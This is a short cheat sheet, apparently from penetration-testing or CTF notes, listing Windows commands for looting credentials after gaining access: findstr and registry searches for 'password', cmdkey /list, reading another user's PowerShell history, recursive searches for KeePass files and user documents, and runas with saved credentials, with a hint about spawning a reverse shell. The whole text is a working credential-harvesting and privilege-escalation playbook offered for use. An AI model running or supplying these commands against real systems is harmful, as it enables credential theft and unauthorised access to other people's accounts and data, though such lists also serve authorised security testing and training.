Password loot

Keep trying these commands one by one to see if you find anything juicy

findstr /si password *.txt *.ini *.config # Password in text files
cmdkey /list
type C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt # password

# All 3 are golden Powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\xampp -Include *.txt,*.ini -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\<steve>\ -Include *.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue

WE CAN ALWAYS SWITCH TO OTHER USER WITH RUNAS COMMAND like and put the password that we found
runas /user:backupadmin cmd # backupadmin is the user here
runas /savecred /user:admin cmd # We can try getting reverse shell install cmd

# Password in registry keys
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Look for desktop.ini on desktop of all users, you may find password sometimes CTFish
Look for unattended.xml files
Look at PowerShell history and appcmd.exe on winpeas